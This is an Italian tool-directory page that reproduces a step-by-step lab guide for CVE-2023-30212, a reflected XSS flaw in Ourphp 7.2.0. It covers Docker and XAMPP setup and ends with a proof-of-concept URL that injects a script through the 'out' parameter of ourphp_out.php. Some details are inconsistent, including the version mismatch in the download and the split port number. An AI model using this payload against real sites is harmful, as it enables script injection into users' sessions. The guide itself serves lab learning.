Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-30212 — Guida passo-passo all'exploit per CVE-2023-30212, una vulnerabilità XSS in Ourphp 7.2.0, con configurazione Docker e dimostrazione di iniezione di payload. | Kitploit
Strumenti/GitHubGitHub/kai-iszz/cve-2023-30212
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubkai-iszz/cve-2023-30212

CVE-2023-30212

Guida passo-passo all'exploit per CVE-2023-30212, una vulnerabilità XSS in Ourphp 7.2.0, con configurazione Docker e dimostrazione di iniezione di payload.

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-30212

Sfruttando la vulnerabilità in Ourphp versione 7.2.0 anche chiamata CVE 2023 30212

Passo 1. Scarica e installa Docker sul tuo sistema (Nota). Sto usando Docker perché è veloce e facile per installare Ubuntu.

Passo 2. Configura l'ambiente Docker

root@kitploit:~
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash

Passo 3. Installa web server, PHP e MySQL. Installerò il server XAMPP per questo.

root@kitploit:~
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run 
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start

Passo 4. Scarica Ourphp versione 7.2.0

root@kitploit:~
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775

Passo 5. Configura Ourphp sul browser Apri il tuo browser e inserisci localhost o 127.0.0.1 Segui le istruzioni e installa Ourphp.

Passo 6. Sfruttare la vulnerabilità La versione 7.2.0 di Ourphp ha una vulnerabilità XSS (Cross-Site Scripting). Per mitigare la vulnerabilità nel file /client/manage/ourphp_out.php che permette l'esecuzione di codice XSS,

è necessario modificare il codice. La vulnerabilità si presenta quando il parametro "ourphp_admin" è impostato su "logout", e la variabile controllabile "out" viene stampata.

Gli attaccanti possono sfruttare questo iniettando un payload come "".

root@kitploit:~
Codice: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>

Screenshot 2023-05-29 135740

Scarica lo strumento